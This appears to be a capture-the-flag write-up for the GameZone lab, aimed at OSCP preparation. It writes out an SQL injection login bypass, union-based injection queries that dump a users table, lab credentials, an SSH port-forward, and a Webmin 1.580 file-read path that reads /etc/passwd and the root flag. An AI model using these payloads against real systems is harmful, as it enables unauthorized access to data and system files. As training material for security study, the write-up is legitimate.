This room covers SQLMap, cracking passwords, revealing services using a reverse SSH tunnel and escalating privileges to root.Crack open Nmap and scan the target.

We go to the webpage and use ‘ or 1=1 — — as username and password and soon we are redirected to portal.php

SQL INJECTION- Automated and Mannual

Since this is an OSCP Path and SQL Map is not allowed in exam, i’ll cover both- SQL injection with and without SQL Map.

Automated Method

We’re going to use SQLMap to dump the entire database for GameZone.Using the page we logged into earlier, we’re going point SQLMap to the game review search feature.First we need to intercept a request made to the search feature using BurpSuite.

Save this request into a text file. We can then pass this into SQLMap to use our authenticated user session.

To crack the password hash, we can go to CrackStation.The password is Videogamer124

Mannual Method

Go to the search bar on portal.php and try these union based sql queries one by one.

‘ UNION select 1,2,3 from information_schema.tables #‘ UNION select 1,table_schema, table_name from information_schema.tables #‘ UNION select 1,table_name, column_name from information._schema.columns #‘ UNION select 1,username,pwd from users #

Basically there is a table called “users” which has the columns “username” and “pwd”. In case of any doubts you can google about union based sql injection or look at the walkthrough video by Motasem Hamdan on his youtube channel.

Moving On… Since we have a username and password, we ssh into the target machine and get the user flag.

We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!

For Reverse SSH Tunnelling we run ssh -L 10000:localhost:10000 <username>@<ip> (AS SHOWN ABOVE)

Once done, just go to your browser and visit localhost:10000 and you will see something running.This is Webmin(a CMS) google for more info, try finding if it uses usernames and passwords

We see that trying default username and password of webmin doesnt work.Once we try our previous one(username-agent47 and password-videogamer124) We are in!

You can also see the version of webmin which is 1.580 and look for exploits for further exploitation

EXPLOITATION-Without Metasploit

Since this is an OSCP path, i will not be covering Metasploit and will go for the mannual way.Now there are two methods.You can find this exploit on exploitdb and searchsploit which is written in ruby and is the easy way.

This exploit was a bit confusing to understand from the instructions but all you have to do is mention the directory you want to access.If you wanted to access /etc/passwd then you will have to visit:

/file/show.cgi/etc/passwd

So just visit the url given below which is the location of the root file(/root/root.txt) and we get the root flag!!!

Another Way to solve this was using a Python exploit which can be found with a google search.

However you will get errors and will have to debug and fix the exploit code.This is because a lot of Libraries get Updated and change frequently.

I have tried covering all the possible ways to solve this machine.I hope you learned something from this writeup — Zeus

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube